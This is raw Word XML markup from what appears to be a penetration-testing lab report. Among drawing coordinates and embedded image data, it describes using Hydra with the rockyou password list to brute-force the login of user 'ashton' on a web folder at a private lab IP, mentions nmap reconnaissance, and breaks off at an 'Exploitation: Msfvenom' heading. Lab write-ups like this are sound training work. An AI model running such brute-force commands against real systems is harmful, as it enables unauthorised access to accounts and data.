                                  <a:pt x="5007" y="686"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5017" y="761"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5020" y="837"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5020" y="6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0" y="4826"/>
                            <a:ext cx="2270" cy="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021" cy="6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33029" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="205" w:line="268" w:lineRule="auto"/>
                                <w:ind w:left="375" w:right="591" w:firstLine="1300"/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thick"/>
                                </w:rPr>
                                <w:t>Tools and Processes</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> Using Hydra (preinstalled on Linux) and a password list (downloaded) I ran the command hydra </w:t>
                              </w:r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 xml:space="preserve">–l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>ashton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 xml:space="preserve"> –P</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="4F8B5ED0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="296" w:lineRule="exact"/>
                                <w:ind w:left="375"/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>/root/Downloads/rockyou.txt –s 80 –f</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="30C11F74" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="15" w:line="266" w:lineRule="auto"/>
                                <w:ind w:left="375" w:right="1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>192.168.1.105 http-get /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>company_folders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 xml:space="preserve">/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>secret_folder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(Ashton’s name I found out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nmap’s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addresses by going to 192.16 8.1.105/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company_folders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  <w:p w14:paraId="7BE064AD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:spacing w:before="1"/>
                                <w:rPr>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="6A83423F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:ind w:left="203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thick"/>
                                </w:rPr>
                                <w:t>Achievements</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="48915F66" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="43" w:line="276" w:lineRule="auto"/>
                                <w:ind w:left="37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This exploit allowed me to further dive into the Company’s directories that are only accessible with the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user name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and a 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065702" id="Group 98" o:spid="_x0000_s1059" style="width:251.05pt;height:323.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="5021,64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">
                <v:shape id="Freeform 101" o:spid="_x0000_s1060" style="position:absolute;width:5021;height:6373;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5021,6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" path="m5020,6373r-4183,l761,6370r-75,-11l614,6343r-69,-22l478,6292r-64,-33l354,6220r-56,-44l245,6128r-48,-53l153,6019r-39,-61l81,5895,52,5828,30,5759,14,5687,3,5612,,5536,,,4184,r76,3l4334,13r72,17l4476,52r66,29l4606,114r60,39l4723,197r52,48l4824,298r43,56l4906,414r34,64l4968,545r22,69l5007,686r10,75l5020,837r,5536xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5020,6373;837,6373;761,6370;686,6359;614,6343;545,6321;478,6292;414,6259;354,6220;298,6176;245,6128;197,6075;153,6019;114,5958;81,5895;52,5828;30,5759;14,5687;3,5612;0,5536;0,0;4184,0;4260,3;4334,13;4406,30;4476,52;4542,81;4606,114;4666,153;4723,197;4775,245;4824,298;4867,354;4906,414;4940,478;4968,545;4990,614;5007,686;5017,761;5020,837;5020,6373" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Picture 100" o:spid="_x0000_s1061" type="#_x0000_t75" style="position:absolute;left:2750;top:4826;width:2270;height:1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">
                  <v:imagedata r:id="rId15" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 99" o:spid="_x0000_s1062" type="#_x0000_t202" style="position:absolute;width:5021;height:6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1FF33029" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="205" w:line="268" w:lineRule="auto"/>
                          <w:ind w:left="375" w:right="591" w:firstLine="1300"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/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  <w:u w:val="thick"/>
                          </w:rPr>
                          <w:t>Tools and Processes</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> Using Hydra (preinstalled on Linux) and a password list (downloaded) I ran the command hydra </w:t>
                        </w:r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 xml:space="preserve">–l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>ashton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 xml:space="preserve"> –P</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4F8B5ED0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="296" w:lineRule="exact"/>
                          <w:ind w:left="375"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr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>/root/Downloads/rockyou.txt –s 80 –f</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="30C11F74" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="15" w:line="266" w:lineRule="auto"/>
                          <w:ind w:left="375" w:right="12"/>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr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>192.168.1.105 http-get /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>company_folders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 xml:space="preserve">/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>secret_folder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(Ashton’s name I found out </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>From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nmap’s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addresses by going to 192.16 8.1.105/</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>company_folders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</w:p>
                      <w:p w14:paraId="7BE064AD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:spacing w:before="1"/>
                          <w:rPr>
                            <w:sz w:val="28"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="6A83423F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:ind w:left="203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u w:val="thick"/>
                          </w:rPr>
                          <w:t>Achievements</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="48915F66" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="43" w:line="276" w:lineRule="auto"/>
                          <w:ind w:left="37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This exploit allowed me to further dive into the Company’s directories that are only accessible with the </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>user name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and a password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6B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="104"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:noProof/>
          <w:spacing w:val="104"/>
          <w:position w:val="41"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65F35BA3" wp14:editId="440F6D22">
            <wp:extent cx="5257814" cy="3758184"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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14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AD29" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B70CB4D" w14:textId="40B6F41C" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="32" w:lineRule="exact"/>
        <w:ind w:left="144"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:sz w:val="3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:noProof/>
          <w:sz w:val="3"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EDA80EE" wp14:editId="58DA107A">
                <wp:extent cx="8605520" cy="20320"/>
                <wp:effectExtent l="2540" t="635" r="2540" b="7620"/>
                <wp:docPr id="10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5520" cy="20320"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="13552" cy="32"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="107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3537" cy="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E72BAB" id="Group 96" o:spid="_x0000_s1026" style="width:677.6pt;height:1.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="1355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">
                <v:line id="Line 97" o:spid="_x0000_s1027" style="position:absolute;visibility:visible;mso-wrap-style:square" from="7,7" to="13544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" strokecolor="#a8b6bf"/>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0133EE71" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:spacing w:line="32" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:sz w:val="3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404F11A2" w14:textId="1E29EC0D" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:right="27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78752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="330F5854" wp14:editId="74B350A6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>269240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>635000</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8605520" cy="4286250"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9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5520" cy="4286250"/>
                          <a:chOff x="424" y="1000"/>
                          <a:chExt cx="13552" cy="6750"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="10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432" y="1008"/>
                            <a:ext cx="13536" cy="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432" y="7727"/>
                            <a:ext cx="13536" cy="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Freeform 93"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="481" y="1320"/>
                            <a:ext cx="5499" cy="6423"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5980 482"/>
                              <a:gd name="T1" fmla="*/ T0 w 5499"/>
                              <a:gd name="T2" fmla="+- 0 7743 1320"/>
                              <a:gd name="T3" fmla="*/ 7743 h 6423"/>
                              <a:gd name="T4" fmla="+- 0 1398 482"/>
                              <a:gd name="T5" fmla="*/ T4 w 5499"/>
                              <a:gd name="T6" fmla="+- 0 7743 1320"/>
                              <a:gd name="T7" fmla="*/ 7743 h 6423"/>
                              <a:gd name="T8" fmla="+- 0 1323 482"/>
                              <a:gd name="T9" fmla="*/ T8 w 5499"/>
                              <a:gd name="T10" fmla="+- 0 7740 1320"/>
                              <a:gd name="T11" fmla="*/ 7740 h 6423"/>
                              <a:gd name="T12" fmla="+- 0 1249 482"/>
                              <a:gd name="T13" fmla="*/ T12 w 5499"/>
                              <a:gd name="T14" fmla="+- 0 7731 1320"/>
                              <a:gd name="T15" fmla="*/ 7731 h 6423"/>
                              <a:gd name="T16" fmla="+- 0 1178 482"/>
                              <a:gd name="T17" fmla="*/ T16 w 5499"/>
                              <a:gd name="T18" fmla="+- 0 7716 1320"/>
                              <a:gd name="T19" fmla="*/ 7716 h 6423"/>
                              <a:gd name="T20" fmla="+- 0 1108 482"/>
                              <a:gd name="T21" fmla="*/ T20 w 5499"/>
                              <a:gd name="T22" fmla="+- 0 7696 1320"/>
                              <a:gd name="T23" fmla="*/ 7696 h 6423"/>
                              <a:gd name="T24" fmla="+- 0 1041 482"/>
                              <a:gd name="T25" fmla="*/ T24 w 5499"/>
                              <a:gd name="T26" fmla="+- 0 7671 1320"/>
                              <a:gd name="T27" fmla="*/ 7671 h 6423"/>
                              <a:gd name="T28" fmla="+- 0 977 482"/>
                              <a:gd name="T29" fmla="*/ T28 w 5499"/>
                              <a:gd name="T30" fmla="+- 0 7640 1320"/>
                              <a:gd name="T31" fmla="*/ 7640 h 6423"/>
                              <a:gd name="T32" fmla="+- 0 915 482"/>
                              <a:gd name="T33" fmla="*/ T32 w 5499"/>
                              <a:gd name="T34" fmla="+- 0 7605 1320"/>
                              <a:gd name="T35" fmla="*/ 7605 h 6423"/>
                              <a:gd name="T36" fmla="+- 0 857 482"/>
                              <a:gd name="T37" fmla="*/ T36 w 5499"/>
                              <a:gd name="T38" fmla="+- 0 7566 1320"/>
                              <a:gd name="T39" fmla="*/ 7566 h 6423"/>
                              <a:gd name="T40" fmla="+- 0 802 482"/>
                              <a:gd name="T41" fmla="*/ T40 w 5499"/>
                              <a:gd name="T42" fmla="+- 0 7522 1320"/>
                              <a:gd name="T43" fmla="*/ 7522 h 6423"/>
                              <a:gd name="T44" fmla="+- 0 750 482"/>
                              <a:gd name="T45" fmla="*/ T44 w 5499"/>
                              <a:gd name="T46" fmla="+- 0 7474 1320"/>
                              <a:gd name="T47" fmla="*/ 7474 h 6423"/>
                              <a:gd name="T48" fmla="+- 0 702 482"/>
                              <a:gd name="T49" fmla="*/ T48 w 5499"/>
                              <a:gd name="T50" fmla="+- 0 7423 1320"/>
                              <a:gd name="T51" fmla="*/ 7423 h 6423"/>
                              <a:gd name="T52" fmla="+- 0 658 482"/>
                              <a:gd name="T53" fmla="*/ T52 w 5499"/>
                              <a:gd name="T54" fmla="+- 0 7368 1320"/>
                              <a:gd name="T55" fmla="*/ 7368 h 6423"/>
                              <a:gd name="T56" fmla="+- 0 619 482"/>
                              <a:gd name="T57" fmla="*/ T56 w 5499"/>
                              <a:gd name="T58" fmla="+- 0 7309 1320"/>
                              <a:gd name="T59" fmla="*/ 7309 h 6423"/>
                              <a:gd name="T60" fmla="+- 0 584 482"/>
                              <a:gd name="T61" fmla="*/ T60 w 5499"/>
                              <a:gd name="T62" fmla="+- 0 7247 1320"/>
                              <a:gd name="T63" fmla="*/ 7247 h 6423"/>
                              <a:gd name="T64" fmla="+- 0 554 482"/>
                              <a:gd name="T65" fmla="*/ T64 w 5499"/>
                              <a:gd name="T66" fmla="+- 0 7183 1320"/>
                              <a:gd name="T67" fmla="*/ 7183 h 6423"/>
                              <a:gd name="T68" fmla="+- 0 528 482"/>
                              <a:gd name="T69" fmla="*/ T68 w 5499"/>
                              <a:gd name="T70" fmla="+- 0 7116 1320"/>
                              <a:gd name="T71" fmla="*/ 7116 h 6423"/>
                              <a:gd name="T72" fmla="+- 0 508 482"/>
                              <a:gd name="T73" fmla="*/ T72 w 5499"/>
                              <a:gd name="T74" fmla="+- 0 7047 1320"/>
                              <a:gd name="T75" fmla="*/ 7047 h 6423"/>
                              <a:gd name="T76" fmla="+- 0 494 482"/>
                              <a:gd name="T77" fmla="*/ T76 w 5499"/>
                              <a:gd name="T78" fmla="+- 0 6975 1320"/>
                              <a:gd name="T79" fmla="*/ 6975 h 6423"/>
                              <a:gd name="T80" fmla="+- 0 485 482"/>
                              <a:gd name="T81" fmla="*/ T80 w 5499"/>
                              <a:gd name="T82" fmla="+- 0 6902 1320"/>
                              <a:gd name="T83" fmla="*/ 6902 h 6423"/>
                              <a:gd name="T84" fmla="+- 0 482 482"/>
                              <a:gd name="T85" fmla="*/ T84 w 5499"/>
                              <a:gd name="T86" fmla="+- 0 6826 1320"/>
                              <a:gd name="T87" fmla="*/ 6826 h 6423"/>
                              <a:gd name="T88" fmla="+- 0 482 482"/>
                              <a:gd name="T89" fmla="*/ T88 w 5499"/>
                              <a:gd name="T90" fmla="+- 0 1321 1320"/>
                              <a:gd name="T91" fmla="*/ 1321 h 6423"/>
                              <a:gd name="T92" fmla="+- 0 5063 482"/>
                              <a:gd name="T93" fmla="*/ T92 w 5499"/>
                              <a:gd name="T94" fmla="+- 0 1320 1320"/>
                              <a:gd name="T95" fmla="*/ 1320 h 6423"/>
                              <a:gd name="T96" fmla="+- 0 5138 482"/>
                              <a:gd name="T97" fmla="*/ T96 w 5499"/>
                              <a:gd name="T98" fmla="+- 0 1324 1320"/>
                              <a:gd name="T99" fmla="*/ 1324 h 6423"/>
                              <a:gd name="T100" fmla="+- 0 5212 482"/>
                              <a:gd name="T101" fmla="*/ T100 w 5499"/>
                              <a:gd name="T102" fmla="+- 0 1332 1320"/>
                              <a:gd name="T103" fmla="*/ 1332 h 6423"/>
                              <a:gd name="T104" fmla="+- 0 5284 482"/>
                              <a:gd name="T105" fmla="*/ T104 w 5499"/>
                              <a:gd name="T106" fmla="+- 0 1347 1320"/>
                              <a:gd name="T107" fmla="*/ 1347 h 6423"/>
                              <a:gd name="T108" fmla="+- 0 5353 482"/>
                              <a:gd name="T109" fmla="*/ T108 w 5499"/>
                              <a:gd name="T110" fmla="+- 0 1367 1320"/>
                              <a:gd name="T111" fmla="*/ 1367 h 6423"/>
                              <a:gd name="T112" fmla="+- 0 5420 482"/>
                              <a:gd name="T113" fmla="*/ T112 w 5499"/>
                              <a:gd name="T114" fmla="+- 0 1392 1320"/>
                              <a:gd name="T115" fmla="*/ 1392 h 6423"/>
                              <a:gd name="T116" fmla="+- 0 5484 482"/>
                              <a:gd name="T117" fmla="*/ T116 w 5499"/>
                              <a:gd name="T118" fmla="+- 0 1423 1320"/>
                              <a:gd name="T119" fmla="*/ 1423 h 6423"/>
                              <a:gd name="T120" fmla="+- 0 5546 482"/>
                              <a:gd name="T121" fmla="*/ T120 w 5499"/>
                              <a:gd name="T122" fmla="+- 0 1458 1320"/>
                              <a:gd name="T123" fmla="*/ 1458 h 6423"/>
                              <a:gd name="T124" fmla="+- 0 5604 482"/>
                              <a:gd name="T125" fmla="*/ T124 w 5499"/>
                              <a:gd name="T126" fmla="+- 0 1497 1320"/>
                              <a:gd name="T127" fmla="*/ 1497 h 6423"/>
                              <a:gd name="T128" fmla="+- 0 5660 482"/>
                              <a:gd name="T129" fmla="*/ T128 w 5499"/>
                              <a:gd name="T130" fmla="+- 0 1541 1320"/>
                              <a:gd name="T131" fmla="*/ 1541 h 6423"/>
                              <a:gd name="T132" fmla="+- 0 5711 482"/>
                              <a:gd name="T133" fmla="*/ T132 w 5499"/>
                              <a:gd name="T134" fmla="+- 0 1589 1320"/>
                              <a:gd name="T135" fmla="*/ 1589 h 6423"/>
                              <a:gd name="T136" fmla="+- 0 5759 482"/>
                              <a:gd name="T137" fmla="*/ T136 w 5499"/>
                              <a:gd name="T138" fmla="+- 0 1640 1320"/>
                              <a:gd name="T139" fmla="*/ 1640 h 6423"/>
                              <a:gd name="T140" fmla="+- 0 5803 482"/>
                              <a:gd name="T141" fmla="*/ T140 w 5499"/>
                              <a:gd name="T142" fmla="+- 0 1696 1320"/>
                              <a:gd name="T143" fmla="*/ 1696 h 6423"/>
                              <a:gd name="T144" fmla="+- 0 5842 482"/>
                              <a:gd name="T145" fmla="*/ T144 w 5499"/>
                              <a:gd name="T146" fmla="+- 0 1754 1320"/>
                              <a:gd name="T147" fmla="*/ 1754 h 6423"/>
                              <a:gd name="T148" fmla="+- 0 5877 482"/>
                              <a:gd name="T149" fmla="*/ T148 w 5499"/>
                              <a:gd name="T150" fmla="+- 0 1816 1320"/>
                              <a:gd name="T151" fmla="*/ 1816 h 6423"/>
                              <a:gd name="T152" fmla="+- 0 5908 482"/>
                              <a:gd name="T153" fmla="*/ T152 w 5499"/>
                              <a:gd name="T154" fmla="+- 0 1880 1320"/>
                              <a:gd name="T155" fmla="*/ 1880 h 6423"/>
                              <a:gd name="T156" fmla="+- 0 5933 482"/>
                              <a:gd name="T157" fmla="*/ T156 w 5499"/>
                              <a:gd name="T158" fmla="+- 0 1947 1320"/>
                              <a:gd name="T159" fmla="*/ 1947 h 6423"/>
                              <a:gd name="T160" fmla="+- 0 5953 482"/>
                              <a:gd name="T161" fmla="*/ T160 w 5499"/>
                              <a:gd name="T162" fmla="+- 0 2017 1320"/>
                              <a:gd name="T163" fmla="*/ 2017 h 6423"/>
                              <a:gd name="T164" fmla="+- 0 5968 482"/>
                              <a:gd name="T165" fmla="*/ T164 w 5499"/>
                              <a:gd name="T166" fmla="+- 0 2088 1320"/>
                              <a:gd name="T167" fmla="*/ 2088 h 6423"/>
                              <a:gd name="T168" fmla="+- 0 5977 482"/>
                              <a:gd name="T169" fmla="*/ T168 w 5499"/>
                              <a:gd name="T170" fmla="+- 0 2162 1320"/>
                              <a:gd name="T171" fmla="*/ 2162 h 6423"/>
                              <a:gd name="T172" fmla="+- 0 5980 482"/>
                              <a:gd name="T173" fmla="*/ T172 w 5499"/>
                              <a:gd name="T174" fmla="+- 0 2237 1320"/>
                              <a:gd name="T175" fmla="*/ 2237 h 6423"/>
                              <a:gd name="T176" fmla="+- 0 5980 482"/>
                              <a:gd name="T177" fmla="*/ T176 w 5499"/>
                              <a:gd name="T178" fmla="+- 0 7743 1320"/>
                              <a:gd name="T179" fmla="*/ 7743 h 64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5499" h="6423">
                                <a:moveTo>
                                  <a:pt x="5498" y="6423"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="916" y="6423"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="841" y="6420"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="767" y="6411"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="696" y="6396"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="626" y="6376"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="559" y="6351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="495" y="6320"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="433" y="6285"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="375" y="6246"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320" y="6202"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="268" y="6154"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="220" y="6103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="176" y="6048"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="137" y="5989"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="102" y="5927"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="72" y="5863"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="46" y="5796"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="26" y="5727"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12" y="5655"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3" y="5582"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="5506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4581" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4656" y="4"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4730" y="12"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4802" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4871" y="47"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4938" y="72"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5002" y="103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5064" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5122" y="177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5178" y="221"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5229" y="269"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5277" y="320"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5321" y="376"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5360" y="434"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5395" y="496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5426" y="560"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5451" y="627"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5471" y="697"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5486" y="768"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5495" y="842"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5498" y="917"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5498" y="6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9" y="1005"/>
                            <a:ext cx="4981" cy="2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9" y="3028"/>
                            <a:ext cx="6544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9" y="4850"/>
                            <a:ext cx="4074" cy="2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62BA75" id="Group 89" o:spid="_x0000_s1026" style="position:absolute;margin-left:21.2pt;margin-top:50pt;width:677.6pt;height:337.5pt;z-index:-16137728;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="424,1000" coordsize="13552,6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DYf8AHpF/1yX+VTVDYf8AHpF/1yX+VT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DYf8AHpF/1yX+&#10;VTVDYf8AHpF/1yX+V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CgAAAAAAAAAhAPBYXVH0&#10;IwEA9CMBABUAAABkcnMvbWVkaWEvaW1hZ2UzLmpwZWf/2P/gABBKRklGAAEBAQDcANwAAP/bAEMA&#10;AgEBAQEBAgEBAQICAgICBAMCAgICBQQEAwQGBQYGBgUGBgYHCQgGBwkHBgYICwgJCgoKCgoGCAsM&#10;CwoMCQoKCv/bAEMBAgICAgICBQMDBQoHBgcKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK&#10;CgoKCgoKCgoKCgoKCgoKCgoKCv/AABEIAbICb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">
                <v:line id="Line 95" o:spid="_x0000_s1027" style="position:absolute;visibility:visible;mso-wrap-style:square" from="432,1008" to="13968,1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" strokecolor="#595959"/>
                <v:line id="Line 94" o:spid="_x0000_s1028" style="position:absolute;visibility:visible;mso-wrap-style:square" from="432,7727" to="13968,7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" strokecolor="#a8b6bf"/>
                <v:shape id="Freeform 93" o:spid="_x0000_s1029" style="position:absolute;left:481;top:1320;width:5499;height:6423;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5499,6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" path="m5498,6423r-4582,l841,6420r-74,-9l696,6396r-70,-20l559,6351r-64,-31l433,6285r-58,-39l320,6202r-52,-48l220,6103r-44,-55l137,5989r-35,-62l72,5863,46,5796,26,5727,12,5655,3,5582,,5506,,1,4581,r75,4l4730,12r72,15l4871,47r67,25l5002,103r62,35l5122,177r56,44l5229,269r48,51l5321,376r39,58l5395,496r31,64l5451,627r20,70l5486,768r9,74l5498,917r,5506xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5498,7743;916,7743;841,7740;767,7731;696,7716;626,7696;559,7671;495,7640;433,7605;375,7566;320,7522;268,7474;220,7423;176,7368;137,7309;102,7247;72,7183;46,7116;26,7047;12,6975;3,6902;0,6826;0,1321;4581,1320;4656,1324;4730,1332;4802,1347;4871,1367;4938,1392;5002,1423;5064,1458;5122,1497;5178,1541;5229,1589;5277,1640;5321,1696;5360,1754;5395,1816;5426,1880;5451,1947;5471,2017;5486,2088;5495,2162;5498,2237;5498,7743" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Picture 92" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:5979;top:1005;width:4981;height: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">
                  <v:imagedata r:id="rId20" o:title=""/>
                </v:shape>
                <v:shape id="Picture 91" o:spid="_x0000_s1031" type="#_x0000_t75" style="position:absolute;left:5979;top:3028;width:6544;height:2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">
                  <v:imagedata r:id="rId21" o:title=""/>
                </v:shape>
                <v:shape id="Picture 90" o:spid="_x0000_s1032" type="#_x0000_t75" style="position:absolute;left:5979;top:4850;width:4074;height:2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">
                  <v:imagedata r:id="rId22" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:t xml:space="preserve">Exploitation: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
